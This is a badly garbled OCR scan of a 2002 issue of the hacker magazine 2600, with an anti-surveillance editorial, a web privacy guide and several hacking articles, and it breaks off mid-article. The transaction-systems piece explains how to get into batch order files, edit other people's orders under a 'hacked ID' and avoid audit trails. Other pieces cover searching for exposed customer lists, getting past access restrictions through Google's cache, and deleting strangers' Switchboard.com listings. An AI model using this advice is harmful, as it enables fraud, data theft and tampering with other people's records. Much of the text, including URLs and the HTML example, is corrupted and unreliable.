💾 Archived View for clemat.is › saccophore › library › ezines › 2600 › 2600_19-1_djvu.txt captured on 2021-12-03 at 14:04:38.
View Raw
More Information
-=-=-=-=-=-=-
i i
r
\ *
jL
jrs-V-^J
r
1
1 "“i M" ^
1 s
■ /
■ : <’
hart
t'O
,f , »;, jv< «i , v . . ■ ••
f'H ■ V
Whatever you choose to call it, this will, he the biggest hacki
conference in the States to date! With nearly 50,000 squat
feet to play with,' expect a variety of speakers, panel
demonstrations, films, and a network like no other.
July 12 to 14, 20
» V T.
%
Hotel Pennsylvania
(Make hotel reservations at (212) 736-5000)
Admission for the entire weekend is $50
You can register online at www.2600.com or send a
check/money order by 6/15/02 to:
2600/H2K2
PO Box 752
Middle Island, NY 1 1953 USA
m
Check www.hope.net for updates!
More details on page 56
Transaction Based Systems
How to Regain Privacy on the Net
Stupid Google Tricks
Neat Stuff with Switchboard.com 11
Poor Man’s 3d 12
Appletalk Security Secrets 14
The Definitive Guide to Phreak Boxes 15
The Bungee Box 21
CampusWide Wide Open 22
Idiocy in the Telcos 26
dr
Letters 30
_ __ • A : x T f i i •%. *■» ■ — - X .| .. , - JJ. -X 1 "i 4 A T -4“ / j ■—«» a
Creative Cable Modem Configuration 40
Fun Password Facts 42
Defeating Network Address Translation 45
NSI Abuse 46
The Threat of a Lazy Admin 47
A Script for the Right Click Suppressed 53
Retail Hardware Revisited 54
More Radio Shack Facts 55
• i - -?■*< -VS 1 - .1 . ■> - r - - — nl»i -i.r* . - - -
Marketplace 56
Meetings 58
"I realize that this bill basically says von con tap someone's phone lor jay
walking, and normally I would say, 'No way.' But after what happened on
September 11th, 1 say screw 'em."' - Dana Lee Dembrow, Democratic
member of the Maryland House ot Delegates explaining her approval nl
new bill that would greatly expand the ability of authorities to momlot
e-mail and telephone traffic* Jaywalkers beware*
Edi tor-1 n -Chief
Emmanuel Goldstein
Layout and Design
ShapeShifter
Cover Concept and Photo
David A. Buchwaid, Bob Hardy
Cover Design
Mike Essl
Office Manager
Tampruf
Writers; Bernie S., Billsf, Blue Whale,
Noam Cfiomslcr, Erie Corley f Dalai,
John Drake, Paul Estev, Mr- French,
Thomas loom, Javamati, Joe330,
Kingpin, Lucky 2 25, Kevin Mitnick,
The Prophet, David Ruder man, Seraf,
Silent Switchman, Scott Skinner,
Mr- Upsetter
Webmaster: Dominick LaTrappe
Web Assistance; Juintz, Kerry
Network Operations: CSS
Special Projects: mlc
Reinforcement: Delchi
Broadcast Coordinators: Juintz,
BluKmght, Monarch, Pete, daRonin,
Digital Mercenary
IRC Admins: Antipent, Autojack,
DaRonin, Digital Mercenary,
Porkchop, Roadie
Inspirational Music: Asobi Seksu,
Lalo Schifrin, Hal Hartley, BKackfeet
Shout Outs: Colteen Anderson,
Vinny, Jeremiah, Stafoburpofse,
Doug Thomas, Free Speech TV,
New Pacifica
2600(1SSN 0749-3851) ispiMisbed
quarterly by 2600 Enterprises Inc.
7 Strong's Lane, Setauket, NY II 733.
Second class postage penult paid at
Seimiket, New York.
POSTMASTER:
Send address changes to
2600 , P.0. Box 752. Middle [stand.
NY 1 1953-0752.
Copyright (c ) 2002
2600 Enterprises. Inc.
Yearly subscription: U.S. and Canada
$18 individual.
S50 corporate (U.S. funds).
Overseas - S26 individual.
corporate.
Back issues available for 1984-2001 at
S20 per year.
$25 per year overseas.
Individual issues available from 1988 on
at $5 each. S6.25 each overseas.
ADDRESS ALL SUBSCRIPTION
CORRESPONDENCE TO:
2600 Subscription Dept., P.O. Box 752.
Middle Island. NY 11953-0752
(stibs@2600.eoni).
FOR LETTERS AND ARTICLE
SUBMISSIONS, WRITE TO:
2600 Editorial Dept.. P.O. Box 99. Middle
Island. NY 11953-0099
( lette rs @ 2600.com . articles@2600.com).
2600 Office Line: 631-751-2600
2600 TAX Line: 631- 4744677
Page 4
2600 Magazine
" ““W *— •
A ime
It's sometimes hard to imagine which causes mare
harm corruption or indifference: One thing is be-
coming clearer b\ the day. They're both needed to en-
sure an ominous future.
What’s been happening in our various govern-
mental bodies is shameful. With each passing day it
seems there's some other horrendous piece of legisla-
tion on its way to becoming law Our rights as inch
vidua! s are either being wiped away to benefit some
corporate in teres; or being severely compromised in
the name of September 1 1 . Either way it's a repugnant
development, one which must lie fought on multiple
levels by people of all backgrounds.
The Digital Millennium Copyright Act (DMCA)
is .something we’ve all become acquainted with in re
cent years, Passed in 1998, ih t DMCA was designed
to implement treaties signed at the World Intellectual
Property Organization ( W I PO | back in 19% So far
it's gotten us sued and gagged, a Russian programmer
thrown into an American prison for writing software,
and a whole host of intimidation tactics, lawsuits, and
threats sent to individuals and companies all over the
world. It is forever changing the concept of free use of
technology and it s the foundation upon which even
more dangerous laws are heing built
The Consumer Broadband anti Digital Television
Promotion Act (f’BDTPA), formerly the Security Sys-
tems Standard'-, and Certification Act (SSSCAk is but
one example. It sounds consumer- friendly but this hit
nl legislation is going to make the DMCA look like
kid stuff. Imagine it being illegal id disable tiny .secu-
rity technology, regardless ol the reason. Or manda-
tory restrictions of any feature which could be used to
copy something, Entire operating systems could be
outlawed- Computer security research will be crip-
pled. Technology itself could conte lo a screeching
bait since tr/friigiial technology will be forced to ad-
here to a government -mandated standard. And we all
know how long it takes any gen eminent to get a grasp
on new technology. Going analog to avoid all this
nonsense won't even be an option in many eases. Dig
ital technology under these rules will be mandatory.
Sake a took at what's happening to analog broad cast-
ing to see how serious they are about this.
The Copyright Arbitration Royalty Panel (CARP),
an oilier offshoot of the DMCA, is targeting Internet
radio as if it were the second coming of Salon. The
DMCA determined that Internet broadcasters must
pay a specific fee for playing commercial music on-
line* regardless ol how badly degraded the quality is.
CARP has come up w ith a tec Structure to enforce this
which will now he decided upon by the U,S. Copy
right Oil tec. That fee is actual ly based on a per sting,
per listener equation which would not only bankrupt
most small and independent broadcasters, bus would
actually require them to keep track of their listeners,
unlike their over-the-air counterparts. The overhead
To Care
of such an operation, not to mention the privacy con-
cerns, will likely persuade most broadcasters to sim-
ply shut down tmd let the more commercial interests
take over. Of course, with enough support, this could
actually come back to haunt the recording industry.
Independent musicians alienated by the Recording In-
dustry oi America (RIAA). not to mention many from
other parts of the globe, may unite against this act of
greed and create u new alternative sound. But who
knows what new law s will spring up to thwart such a
development once ii becomes a reality? It’s cleat that
anything seen as a threat to those who manage to ac
quire everything will be quickly struck down in one
way or another.
And of course we will always have gems like the
Communications Decency Act (CD A), which was
overturned by the Supreme Court in 1997 as an un-
constitutional attack on free speech. That led to the
Child Online Protection Act (COPA), passed in 1998.
which basically threatened to reduce the Internet to a
playground for kids, imposing severe criminal and
civil penalties on providers who may have "inappro-
priate material" somewhere. Despite its being struck
down by a court in 1 999 t more variations just keep on
coming Now it’s the Children’s Internet Protection
Act KlPA). which wem into effect Iasi vear. This lime
m
libraries were targeted Those that don't comply with
mandated blocking and li lie ring standards wilt lose
funding, And the dance continues.
There's DCS- 1 000 (more aptly named "Carni-
vore" in the past), the mysterious l : BI e-mail snooping
program installed in the offices of Internet Service
Providers nationwide. And there's Magic Lantern, an-
other Hi! project, which reportedly infiltrates a user ’s
computer via an e-mail attachment and then sets up
monitoring software which can capture keystrokes,
thereby helping to make encryption futile,
Wc could even talk about the badly thought out
USA Patriot act (which actually stands for "Uniting
and Strengthening America by Providing Appropriate
Tools Required to Intercept and Obstruct Terrorism")
and all of its attacks on fundamental freedoms, not to
mention the preponderance ol imitators which seek lo
destroy what it is our nation stands for as some sort of
way of attacking those who want to destroy what it is
our nation stands for
It's easy to become completely overwhelmed by
all of this and, as a defense mechanism, to simply shut
down and stop paying attention, In fact, this Is rather
essential in order for such cru/y laws to work in the
first place. Imagine what would happen if everyone
realized the threat, H everyone understood the tech-
nology, The secret dial is luring kept from most A that
people jxiwer doe* work that activism is effective,
and that "eternal vigilance means l ontinuous action,
not simply quoted words
This is where the hacker world comes in. Unlike
Spring 2002
Page 5
legislators and unlike those who have become swal
lowed up by the "industry," we have an understanding
of Ihe technology an d the ability' and desire to commu-
nicate with others outside our work! What belter way
to translate the evils ol these new laws into terms that
even one's grandmother could understand?
i'li ere are many groups already involved KFF.
EPIC, the ACLU, and more. They are all in desperate
need of support. UN absolutely vital that we help to
take on this task. A look at many websites and hand-
outs ounce ruing tbe>e issues shows that many quickly
become lost in legal or technical jargon that means
nothing to the average person. The result is that the ac-
tual threat never bums icsclf into that person \ mind
and it becomes a non- issue to them from that point on.
We can help to lis ihat.
This will be one ol the goals at 1I2K2 this July.
Phere will be many people from outside the hacker
world who will come to hear what we have to cay arid
who will be in a position to help us greatly if the facts
arc made clear to them. We need to come up with a
comprehensive plan |o light not only what has already
been proposed and adopted, but alt of the future legis
iatuur (hai current fy only exists in some warped law
makers' minds. To do this, we will need to predict bow
their corrupted logic will proceed and be able to m
spire those who might otherwise not care. It s going to
be a long and hard battle and die odds are already
cleady against us,. Can you think of a reason nos to get
involved right away?
by S ta nkDaw g @ h ot nia i I xoro
Let's jump right in lo the first question: "Wtiat
the bell is a transaction based system?" Wei!., iris' »S*
straight forward as it sounds. It is a system that
works using nun sac turns lo process data. Retn^miV
her ib at interactive processing shows immediate re-\\
suits, hut batch processing takes more rime.
Transaction based systems are exclusive to batch
processing (although some systems may support
both types of access i
For example, when you go to http:// store, ya-
h no co m/2600hac ker/ (plug, plug...! or some ot her
online shopping site, you add things to your shop-
ping can and IhcEi finally go lo checkout This is
where you can sec transaction processing happen.
Do you think a little bell rings somewhere an a
warehouse and someone rum to get your product
right away? No, it will create a transaction Ihat per-
forms several functions. First, it will send the actual
order to 2600 notifying them of their obligation. It
■■ if Ja ijg W £*£■
sue dch uiTdy keeps records bf die r own
titans. Bu( ibis unk-k Is .to? about being
lebed or tracked by Big Brother, so I digress,
f realize what happens to your data
in transaction processing and you understand that
it is stored -some where. What good o ill is i it forma
tror to y*x/? C>:ick ymr Knuckles and stretch be-
cause it is time to get todinical,
Transaciions run on s6me son of regular cycle
that is determined bjflfjaeh individual company,
Gen era! ly, lha [ is (o run the transaction c y dec nee;
pet day (you e\ or .seen that warning that il may take
2^iioni > lo process your transaction?). Some com-
panies run these programs hourly or even more fre-t
quern l y, but this is stressful on a system. While
there lias been a trend moving towards live" in-
vernory and order processing, it is still in its in-
fancy. Generally, all of the orders taken at a
particular site will get stored in a temporary file in
the form of transactions. These transactions have
also submits a transaction to Ihe credit card com-
pany with details of the purchase and <t$ks for Ihe
payment . H updates its own system at yahooxom
with accounting information (billing 2600 for a flat
hosting fee, along with a per transaction ice to gel
their "cut," plus any number of other accounting
and tax record keeping fund ions). While you are
silting there looking at the thank you for ordering"
screen, all these dungs have happened in the back-
ground.
So why should you care? Well now that you
know exactly whal transactions arc, where do you
think the data in those transactions are kepi? They
are transactions that process data after all, and data
doesn't normally just disappear. It is kepi for tax
purposes and hilling purposes as mentioned before.
Everything you have ever ordered online h main-
tained. Don't overlook that fact. No one throws
data aw ay I So fur. I don’t know of any centralized
location where all of your purchases are kept, but
programs behind them that decode the transaction
data and tell the system what to do with the data
within. A lypical I unencrypted) transaction can be
as simple as this,
Jitt rm ®dbZ'C0wD2 1 nOOlPZbWmOOAny
roadNYl-345 CCI 23456789000
If you look closely and decipher what you see.
you may be able lo figure out that ihe key to the file
appears to be rny friend's email address (this is
common because it is unique and not as personal as
someone's SSN). Beyond tlus, you might be able to
figure out that on (12/ 13/200 2 lie purchased (the lea
ter P) two (2) products classified as TL I f lowers!
which is product 01 The delivery address follows
(note that this entire transaction is made up) with
the last fields being his credit card number. This is
what the system gets when you click on ihat order
button. Then, usually in the middle of the night
(downtime for most systems) a batch job runs that
picks apart those transactions and sends out the
Page 6
2600 Magazine
parts thai 1 mentioned earlier in the article This is
when ihc real work gets done and the order is truly
processed. The deduction from your account will
appear the next day, the warehouse will get the
work order to process i Ise purchase, etc. So the
question I pose to you is how would I place an or-
der without ever seeing the web page?
Think about that for a second before reading
further You may see that the web is simply the in-
terface that gathers information and generates the
transactions. It is actual iy the transactions, and the
programs that process these transactions, that actu-
ally do the work. So if you could get into the trans-
action tile yourself, you would have direct control
over the transactions. Now keep in mind that 1 am
only explaining how- these systems work, 1 am not
suggesting or insinuating that you should do any-
thing illegal with this know ledge 1 You are on your
own there, I am only here to inform.
IT you were able to gain access to this hie (this
is a topic that has been beaten to death, find your
own way in), you could edit the tile to have any
transaction you wanted. You could cancel your own
order, change your address, or any other number ot
things. You probably realize by now that you tire
editing all of the records in the f inin' file, not just
your own. And the beauty is that in my experience,
the audit trail ( the logging of who does what to the
system) happens on the interface side of the house,
not the data side. The web server logs your visit and
your order, but if you edit the Hie directly, it usually
doesn't get logged. They assume that general sys-
tem security is keeping you away from this infor
security that audits both, but in my experience it
doesn't happen. You edit the Hie, and the worst case
1 usually see is that it timestamps the edit and
marks it will] the user’s ID (which is unimportant if
you are using a hacked ID). It is also unimportant
because one of the parts usually in the transaction
process is to son the tile and/or backup the file
which puts the job timestamp and system ID back
on the file! As ihe program runs, it hides your foot-
steps for you!
Also, (here is a liming issue involved when
multiple transactions are going on. The order may
be processed on an hourly cycle, but die credit card
company may only process all of its charges at fie
end of the day, This is how people in the pa^t would
be able to use a stolen credit card all day without
getting caught. It wasn't until (he next day that the
suspicious activity was noticed. Of course, the
credit card companies got wise to this and now arc
much more up to date on their monitoring.
Willi all of this being said (particularly my
warning that you are at your own very high risk if
you do anything illegal), I think that if you look
around each day you w ill see how transactions are
extremely prevalent in your everyday life. The
ATM will not process your deposit until the next
business day (sometimes a manual process). A
change of address may not be reflected until 24
hours later. Listen jerk, \ paid that ticket last week,
why hasn’t it been cleared from my record? Wait-
ing on a change of grade at school before you can
gel your loan? All of these can now be explained,
and now, maybe you can do something about ii
without wailing on someone else.
niaiion. Obviously a good com pan y will h a v e got j d
by Boris Loza
You'd probably be surprised ii you knew what
information is available about yourself on the In-
ternet. Whenever you connect to the Internet you
leave a great trail of information. Do you want to
know what kind ‘ Go to http://www.-leader.ru/se-
c u re/ wh o. h t ml or hup: //w ww, a n o n y m i z.c r
com/Mionp.cgi and see.
They can find out where you've come from,
your operating system, browser type, and man)
other things. Besides this, many servers keep care-
ful records of your input into search engines, infor-
mation that's submitted in forms, your shopping
habits on ibe Web, and information about up-
t » >a ded/do wnlc >a ded files.
W ho Gels This Information and How?
Some companies, such as Doubleclick, create
large databases of such information, which are
used by target advertising companies or which can
be sold to any interested buyers. Have you ever
wondered why every copy of Netscape running on
Microsoft Windows defaults to honie.-
tieLscape.com as a home page and the Internet Ex-
plorer browser defaults to www.rusn.com?
Another method that web sites use to track vis-
itors is a special feature called a cookie, which
contains a small amount of information transmit-
ted bet w £ t n a web serve r and a brow sec Cookies
can contain your username/TD, computer type. IP
address, and server location
Ever heard ot web bugs (also known as dear
CiiFs)? Like cookies, web bugs are electronic tags
that help web sites and advertisers track visitors'
whereabouts in cyberspace, The placement of a
web bug on a page allows the site hosting the ban-
ner ad to know your IP address and the page that
you visited, Ilus can be further correlated to
cookie information that may He sent by your
Spring 2002
Page 7
browser as pan of the request to retrieve the page
But web bugs are invisible on I he page and are
much smaller, about the size of (he period at tlse
end of l Ins sentence, Unlike cookies* people ean'i
see web bugs and anti-cookie filters won’t catch
them.
Browsers also contain other useful data tor
those who know how to make use of it, such as hit
logging and QUID numbers, as used by Mi-
crosoft's internet Explorer. Hit logging keeps track
of all of your offline activities. When you click on
a banner ad. a record is made of how long you
looked at it and what ad you clicked on. as well as
personal information stored by the IE browser. I lit
logging Is also designed to "phone home" to the
server that created it.
GUID numbers are randomly generated Guar-
anteed Unique" or "Globally Unique" ID numbers.
It’s highly unlikely that these numbers will ever
occur twice across the planet. They are the ulti-
mate "electronic dog tag" and can survive even if
you kill the cookies and remove the "spyware."
Since the GUID number is kept on your sys-
t e m , it can be r eq ue st ed at any t i me . And s i nee M i -
crasoft has it on its databases - along with your
name, address, and other registration details - the
potential for creating a system that tracks your
every online move is enormous. And there's even
morel Did you know that if you’re on a network,
every Office 97 file you create could be traced
back to you? Th ft is because Office 97 attaches its
own permanent til HD to everything you create. So
if you send a document to your best friend and she
deletes its entire contents, replaces it with abuse
about your boss, adds a macro virus to iu renames
it, and sends it lo everyone in vour company, ii T s
still got your address on it as the originator 1 You
can see what GUID looks like by opening ary Of-
fice 97 Word hie with Notepad and searching for
the phrase GUID, A lew bytes later, you'll find an
ID number broken up with spaces inside two curly
braces. By the way. GUVD helped to capture a cre-
ator of the Melissa virus. But that's another story.
Other applications and companies that use
"spyware" and "phone home are Real Netw ork s
ReaJJukebox. PKZip. 2 Bubble*. ( uieFTP. and
many others. SurFMonkey is an application that's
supposed to block Internet sites inappropriate for
kids, but it also keeps their personal l IX phone
number, and err at I address. Radiate is a company
that serves the sharew are market. Popular applica-
tions such as GOIZilla. Tree Solitaire, and
Get Right come embedded with an automated ad-
serving spyware" package created by Radiate
More than 400 different applications have this pro
gram embedded w ithin them.
The Comet Cursor from Comet Systems is cur-
sor software that replaces the standard screen cur-
sot with many funny-looking cartoon characters
that appeal to kids, such as Garfield and Pokemon,
This is free software, hut while users think they’re
gelling just a cute cursor, in reality every time they
visit any ot 60,000 web sites supporting Comet
Cursor technology, it will re (ion the user’s unique
serial number back to C omet Systems, Therefore
a profile of the user's interests can be compiled,
and targeted ads can be served up to the users
(There’s no such thing as a free lunch!)
fit this article, we'd show- wfiaf you am do to
minimize, and sometimes prevent, submitting in
formation to die Internet on your behalf. Even d
you continue to allow' it to happen, at least you'll
he aware of how they do it.
C 'or ikies and Web Bugs
When you revisit an Internet server, your
browser shares the cookie previously installed on
your hard drive, providing information that
quickly identities you. Whenever you hit a Web
site supported by advertising, the ad server reads
the cookie from your machine. The ad server then
uses your cookie to look up your profile and deter-
mine which ad to serve to you dynamically, based
on the interests it's gleaned from your surfing ac-
tivities at its member sites. The ad server also
records which advertisements you've clicked
through. I he type of ad and the amount of time
you've spent at the site is also captured. Also keep
in mind fha? cookies, the subject o) several law-
suits* are sent in clear text, in both directions,
whenever encryption isn't used.
It you use Internet Explorer on Windows 2000,
you can see. your cookies by opening the Docu-
ments and Settings^ Your Profile ]\Coukies direc-
tory. The cookie folder consists of several files,
each ot which is a text file containing an actual
cookie value. Eor more information about how Mi-
crosoft bakes" cookies check the Cookies with
Your Coffee” article ai http; //msdit micraso fi-
. co m/I i bra ry / de fau 1 1 . as p 7 1 1 r I -i ! i brary / e n -
us/dn _v o i ces w ebm en/li t in 1/we bm e nO 5 2797. as p
Microsoft IE 5.0 has a lot of menu and dialog
changes, but you can still disable cookies. Go to
the Tool sJ i ntemet Options/Security menu. In there,
you can choose the security level for four different
browsing conditions: Internet Sites, Local Sites.
" Trusted" Sites, and Restricted Sites If you select
"Internet’ 1 , and click on Custom Level, you'll get a
dialog box where you can accept all warn before
accepting, or reject all cookies.
Once a cookie is rejected, it is thrown out and
not saved to memory or disk. Don't forget, though,
that servers will keep looking for ihe cookie even
if you have discarded it and may try to replace it as
you surf around Remember also that some web
sites (such as www.hotmail.com) require cookies
You can mol login into such websites if you've dis-
abled cookies.
Netscape users can also see their cookies found
in the C:\Program I : iles\Netsuape\Users\[Your pro-
lilelWooi.ies.txt tile. This rile consists of a block of
ASCII text. Briefly, what you can see in this file is:
Domain The domain that created and can read
Page 8
260<t Magazine
I he variable (such as .google.com).
Flag. A TRUE or FALSE v alue indicating it all
machines within a given domain can access the
variable. The browser, depending on the value set
for domain, sets this value automatically.
Path, The path within the domain for which the
variable is valid.
Set ' it re. A TRL T or ! v\ LS E v a l ue indicating if
a secure connection dike SSI..) with the domain is
needed to access the variable.
Expinatiit/L The time at which the variable will
expire. Time is debited as the number of seconds
since Jan !, 1970 00:00:00 GMT (example:
2145774284).
Name. The name of the variable.
Value. The value of the variable.
For more information about Netscape cookies,
browse Netscape's Cookie Spec located at
b t tp ://w w w. i lc l scape .co in/ n ew s re 17 std/coo k i e_s pe
c-.html. For complete cookie information refer to
R FC 2 1 09 at http://vv w w. rfc.nct/rfc2 1 09 .In ml.
Note that most cookies can be accessed by all
hosts in the domain (eg, googlexom t
hot mail.i ns n .co m . etc . ) !
If you want to disable cookies on Netscape go
hi the Ed i t / Pre fe re nces/Ad v an c ed/C ook ie
The web hugs, like cookies, arc usually used
for tracking customer habits but are much harder
to detect. A web bug is a graphic on a web page or
in an email message that's designed to monitor
w ho s read in a t he page o r message. Unfortunately,
this technique could be used toward malicious
ends, such as grabbing iP addresses or installing
tiles. The security company Security Space, in a
monthly report (hllp://www. Security space, -
com/s_survey/data/man.200 1 i 2/ webbug.html),
has identified companies that benefit from the use
of web hugs, including online advertising net-
works Doubleclick and Link exchange, as well as
Google and America Online.
The only way to find a web bug using the MS
Internet Explorer and Netscape browsers is to view
the HTML source code of a weh page and search
for IMG tags that match up w ith cookies stored on
the user’s computer, A web bug typically has its
HEIGHT and WIDTH parameters in the IMG tag
set to L it s loaded from a different server than the
rest of the web page, and it has an associated
cookie. For example:
< img sn ■ = "hup: //ads. mm . . ct mV ads/ A B U CH E/00 7
4235001 5 J Y. g if? Pagegr oup=BECHJ£J " wid
ih= V H heigiti- "I " border* "0" cilt= ,, *">
This web hug was placed on the home page by
Microsoft's site www.bcentral.com to provide
spy" information about visitors to ads.msn.com.
By the way, this site contains more than ten web
bugs!
Email web bugs are also represented as I -by - 1
pixel IMG tags jusi like w eb bugs for web pages.
However, because the sender of the message al-
ready knows your email address, they also could
include the email address in the web bug URL.
The email address can be in plain text or en-
crypted ,
Web bugs used with emails allow the measure-
ment of how many people have viewed the same
email message in a marketing campaign. They
help to detect whether someone has viewed a mes-
sage. (People who don't view a message arc re-
moved from the list for future mailings. ) They also
help to synchronize a web browser cookie to a par-
ticular email address, allowing a web site to know
the identity of people who come to the site at a
later date.
Using web bugs also allows the sender of an
entail message to see what has been written when
the message is forwarded with comments to other
rec ipient s (http: 7/w w w, pri v a e y ft >u nd ati on . o rg/pri -
v acy watch/report, asp 7 id=54&acticuM)),
For a demonstration of bugged email see
http ;//m ac k ray, .co m/ trie ky b i t/ readrccc i pt/ .
For more information,, check the web bug FAQ
at http://www.eff.org/Pri vacy/Marketi ngA
web bug hunt or see the web bag gallery at
hup :// w w w. bi ig i icsi s.org/e xample s.html . You ea n
use a free web bug detector plug-in for IE called
Bugnosis by the Privacy Foundation
h tt p :// w w w . bug nos i s, o rg/.
Proxies, Anonymity Providing
Servers, and Remailers
One can remain anonymous while web surfing
by using a proxy server. A proxy acts as an inter-
mediary, routing communications between clients
and the rest of a network, Web proxies can hide
your IP address and allow you to stay anonymous.
If you don't use any proxy server yet, you may
choose one from a free proxy public servers list al
Http: f/i oo Is . ro si n siru men t .cori i/prox y. T< > con I i gi Ere
your Internet Explorer 5,0 browser to use a proxy,
go to the Pools/ Internet Options/C on flections
menu bar. Click on the Setup and follow the In-
structions on the screen. Check the Manual Proxy
Server option and click on the Next Pm (he host
name of the proxy you re going to use and a port
number (provided by proxy server). To check
whether your proxy server reveals your IP address,
go to htlp://w w w.all-nettools.com/pr.htm. If you
gel the message 'Proxy Server Detected!' 1 , then
l here's a security hole in your proxy and informa-
lion about your real IP address is listed. (In this
ease, try to use another proxy.) It the message is
"Proxy Server Not Detected 11 , everything should
be OK.
Netscape users can add a proxy by going to
Ed i 1/ Prefe re nces/ A l. I va need/Proxy.
If you don't want to use a proxy server, try one
of the anonymity providing servers listed below.
These servers act as a proxy since weh pages are
retrieved by them rather than by the person actu-
ally browsing the web (you). Go to one of these
web sites and jusl type a URL. you want to visit -
Spring 2002
Page 9
i he server does the job for you , securing you from
many potential dangers.
Some of the Anonymity Providing
Servers Available
Servers with SSL Support
A n ony niv th : h tt p: //ww w, an on y i n v t h co 1 1 1
Oranga tango:
htt p :// w w w . o ra n ga lango, co 1 i 1 /h ome/ i nde x.ns.html
Rjewebber: http ://w ww t rewe b be r. com and
hup:// wwwainon.de
5 enters without SSL Si tpport
A n ony m ou se: http :// 1 10 n y m ou se . c om
A non ym rzer; fit t f > :/Av w w . a non ym t zee cot n
S i ege So ft: htt p :// w ww. s i egeso ft . com
A not 'i y m ytb uses 5 1 2-bit SSL one ry ption for ai 1
HTTP data, which prevents your ISP from tracking
your Internet activities. The only traces ibal are left
from your browsing are in your browser history
list.
If you want to remain anonymous while send-
ing emails, you can use a remailer. This is a special
service that receives an email message from yon,
then readdresses it, and sends it to I he person you
want to send it to. During the process, any headers
that might point back to you are removed, Many
remailers arc available on the Internet; some of
them tel you put a fake return address, but most of
them directly state dial the message is sent from an
anonymous source. One nt these web-based re-
mailers can be found at https://ssl.dm3 m. com/-
heip/remailer.html for a list of remailers cheek
http:// seeu H l y. t ao . ea/e i na i 1 ,s h t m t .
Other Useful l ips
You may want to clear out your browser 's his-
tory list, rids is something that should be done
each time you're finished with your browsing if
you don't want someone to be able to easily see
where you've been surfing (it you share your Win-
dows workstation or server). To do this for Internet
Explorer 5,0:
< lick, i he Tools menu bar.
Choose Internet Options,
t )ti the General tab. click Clear History,
When it asks "Delete all i tents in your History
folder?" dick OK.
Click the OK button at the bottom of the Intel
net Options window.
Another place that your web trail is recorded is
the cache directory - a temporary storage area lot
recently visited pages and images. Ehc cache ah
lows for repeatedly visited Web sites to show up
mom quickly when you reload them into your
browser. If you don't want people to read youi
cache it should be deleted. Note, however, I hat on
slower machines with slow connections, this will
result in a noticeable decrease in the speed when
your computer brings up previously visited web
pages, fo delete your cache on IE 5.0:
Choose Internet Options from IE’s fools menu.
Locate the Temporary Internet Files heading,
click the Delete Files button, and choose OK when
prompted.
Click the OK button at the bottom of the Inter-
net Options window.
flase and restart your browser.
Netscape users may go to the Ed it /Prefer-
ences/Navi gator menu to delete your browsers
history list and lo the Edil/Prefcrences/Naviga-
ror/Cache to clean up your browser’s cache.
Bala nee Your Paranoia
This article isn't intended to frighten you. lust
remember that there isn't much privacy on the In-
ternet. So think carefully about which sites you
choose to visit, and think twice before you provide
any information about yourself.
Stupid Google Tricks
by Particle Bored
Google.com has long been the undisputed king
of search engines, yet few arc aware of its power
as a hacking tool. 1 have discovered a few features
that are sure to provide hours of fun for the whole
family,
Fo waste a lew seconds oi your life you can
change the language via the Language Tools link
on the main page, it is possible to change the lan-
guage of the interface to anything from Bengali to
Telugu. but I prefer Elmer Fluid , Do not attempt to
use the Hacker language w hile under the influence
of caffeine, as you are likely to kick a hole in your
monitor.
One of the features that gets me quite aroused
is Google's ability to search files with a specific
DOS extension. This is done by submitting a query
in the following format:
sen n h S e n ns fit etype , r ext
where search terms are. uh, your search terms,
and ext is a typical DOS file extension. Searches of
x Is and mdb tiles are great for finding things like
customer lists. You can even search text within vbs
and dll files. As far as 1 can tell there are no limits
as to the file type, so there is plenty of room for
creativity.
I’m sure all of you have visited a worthless
web site where you can't locate information even
if you use their search engine, like sun.com. Well,
let Google search their site for you. Using sun.com
Page 10
2600 Magazine
as an example, simply use the format;
search terms site: sun.com
and you will probably find w hat you seek.
Another cool feature is the ability to search for
^iies that link to a specific site. Not only can you
use this to discover who is linking to your web site,
but it is good for quickly finding all of an interna-
tional company’s web sites. Tor sun.com 1 would
use the format:
search terms Unit: sum corn
Use only the domain name or you will restrict
the results
As for restricting results, there are times you
will need to search only the title since searching all
of the text yield , far too many hits. Searching titles
only can be done with this:
alkali fie: search terms
I'm not sure why they changed the syntax on
this one. Note the space after (he colon, too.
Google is great for working with phone num-
bers as well. Searching on an area code and prefix
will quickly give you the location of an unknown
target since one of the hits is likely to contain art
address. Hut wait Google can do reverse lookups,
too! Simply enter the area code and phone number
fin dashed format) as the query.
You may want to use this final trick quickly,
since 1 fear the functionality may disappear soon
after this article is published. Have you ever found
the perfect document, only to be denied access be-
cause the .mil sue where it resides doesn't like
your source IP? If you look within the query re
suits you will hopefully find links that say
"Cached” or "View as HTML”, follow the link
and you will be able to view Google s copy of the
document.
by Cmming Linguist
n i n n i ng I i n gu is t & h us h ina i I. com
Switchboard.com - its the Yellow Pages. Electn-
i ] ed Suit c h b oard .co m is an online di rev l ory o f c i t -
izenx nationwide, You can find friends, family, or
anyone listed with a name yon know. In many
uses, you l! come up with more than one listing
tor a specified name. One of the cool things about
Switch board, com is the fact that if a person has all
of their information you might be able to find a lot
more information than you intended. On a search
lor my name, 1 found one ol me listed in my area
and found Ids complete address, all three of his
phone numbers, and all of his e-mail addresses,
Switchboard com also provides hours of enter-
vummeru tor the bored teenage-] in his room with
nothing to do, Searching for one mister Hairy
Balls provides bands of laughs, as does searching
for Dick Paine and Harry Butts. But now. on to the
real stuff.,.
Like the Anuizon.com mishap a while back,
where people could w rite comments about a book
is rhe author of that book, Switchboard.com al-
lows you to add or delete users listed without any
authentication whatsoever, except an e-mail ad-
dress. When I searched For my information, l did-
u’t find me, hut l bound my mother and father. I
opted to delete their listings from the database of
pe o pie, s o 1 took r he a ppn :> pr i ate * t e p s by clicking
nn their names (which appear in hold text), click-
ing the Update Listing 1 ' link on die right-hand
menu, and clicking the button Libeled "Ren;---
Listing", (You can also -update the fisting, also by
simply enteri )tg. ; a n e-m a j 1 a d d re s s w h i ch no -doul >1
you'll throw away at Yahoo? -s expense.) Auer en-
tering an e-nun nddre.ss 1 shan’t use again, ! re-
ceived a link in:-th$ von I i rotation mail which 1 was
instructed to click. After 1 complied J was directed
to a page that o ld -i ne the 1 1 m tig was m m <, > v ed.
You can modify • ; dd etc any pew*-. i s account.
Lm sure Sac V- in So m c where, USA? w on' t be
loo pleased if his family es looking for his phone
number online and dials Ms. Trixy's House of
Sexy Sexual Sex by mistake. Or if (hey can’t find it
at all. Adding a listing is not a problem, either
Here’s one some fellow posted: tmpd/www.
swilchboard.com/l-jin/cg i nbr.dl I ?| D=50O683995&
MEM= 1 & FLING =MOK K&TYPE= 1 007,
In retrospect, 1 suppose you really can't use any
kind of security measure to ensure a random per-
son doesn't delete your listing. I mean, the listings
cm! up there one w ay or another; I know my father
